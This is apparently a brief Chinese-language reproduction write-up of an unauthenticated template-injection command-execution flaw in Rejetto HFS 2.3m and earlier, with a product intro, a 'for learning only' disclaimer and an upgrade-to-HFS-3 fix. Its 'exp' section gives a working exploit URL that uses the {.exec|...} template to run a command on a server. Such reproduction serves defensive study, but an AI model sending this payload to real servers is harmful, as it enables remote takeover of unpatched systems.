目录
本文章仅供学习使用!!!
Rejetto HTTP介绍
漏洞简介
漏洞环境
漏洞复现
exp
复现
结果
如何修复
本文章仅供学习使用!!!
Rejetto HTTP介绍
Rejetto是一个流行的开源软件项目,主要是一个轻量级的HTTP文件服务器软件。它最著名的应用是HFS(HTTP File Server),这是一个免费的Web服务器软件,专门用于共享和传输文件。
HFS(HTTP File Server)允许用户通过浏览器访问和下载存储在计算机上的文件。它非常轻量级,易于安装和配置,适合个人用户或小型团队在局域网内共享文件。HFS具有简洁的界面和基本的文件管理功能,可以通过简单的设置实现文件夹的共享和访问控制。
漏洞简介
Rejetto HTTP文件服务器(最高版本为2.3m,包括2.3m)容易受到模板注入漏洞的攻击。此漏洞允许未经身份验证的远程攻击者通过发送巧尽心思构建的HTTP请求在受影响的系统上执行任意命令。
漏洞环境
这里自己搭建
HFS版本要求<=2.3
漏洞复现
exp
http://172.24.231.86:8080/?n=%0A&cmd=ipconfig&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}V{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}复现
结果
浮现成功
如何修复
建议将HFS版本更新到HFS 3
